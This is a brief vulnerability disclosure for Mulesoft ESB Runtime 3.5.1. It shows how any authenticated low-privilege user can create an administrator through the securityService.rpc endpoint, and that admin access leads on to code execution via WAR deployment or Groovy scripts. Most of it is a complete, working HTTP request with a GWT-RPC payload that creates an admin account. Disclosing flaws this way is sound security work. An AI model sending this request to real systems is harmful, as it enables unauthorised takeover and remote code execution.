Mulesoft ESB Runtime 3.5.1 Privilege Escalation / Code Execution

`Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code  
Execution  
  
  
  
Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to  
create an administrator user due to a lack of permissions check in the  
handler/securityService.rpc endpoint. The following HTTP request can be  
made by any authenticated user, even those with a single role of Monitor.  
  
  
POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1  
  
Host: 192.168.0.22:8585  
  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0)  
Gecko/20100101 Firefox/31.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Content-Type: text/x-gwt-rpc; charset=utf-8/  
  
Referer: http://192.168.0.22:8585/mmc-3.5.1/index.jsp  
  
Content-Length: 503  
  
Cookie: JSESSIONID=CEB49ED5E239CB7AB6B7C02DD83170A4;  
  
Connection: keep-alive  
  
Pragma: no-cache  
  
Cache-Control: no-cache  
  
7|0|15|http://192.168.0.22:8585/mmc-3.5.1/com.mulesoft.mmc.MMC/  
|5192695B02944BAAB195B91AB3FDDA48|org.mule.galaxy.web.rpc.RemoteSecurityService|addUser|org.mule.galaxy.web.rpc.WUser/4112688705|java.lang.String/2004016611|  
[email protected]  
|java.util.ArrayList/4159755760|298e8098-ff3e-4d13-b37e-3f3d33193ed9|ed4cbe90-085d-4d44-976c-436eb1d78d16|ccd8aee7-30bb-42e1-8218-cfd9261c7af9|d63c1710-e811-4c3c-aeb6-e474742ac084|fdsa|notadmin|notpassword|1|2|3|4|2|5|6|5|7|8|4|6|9|6|10|6|11|6|12|0|13|0|0|14|15|  
  
  
This request will create an administrator with all roles with a username  
of notadmin and a password of notpassword. Many vectors of remote code  
execution are available to an administrator. Not only can an administrator  
deploy WAR applications, they can also evaluate arbitrary groovy scripts  
via the web interface.  
  
--   
http://volatile-minds.blogspot.com -- blog  
http://www.volatileminds.net -- website  
  
  
`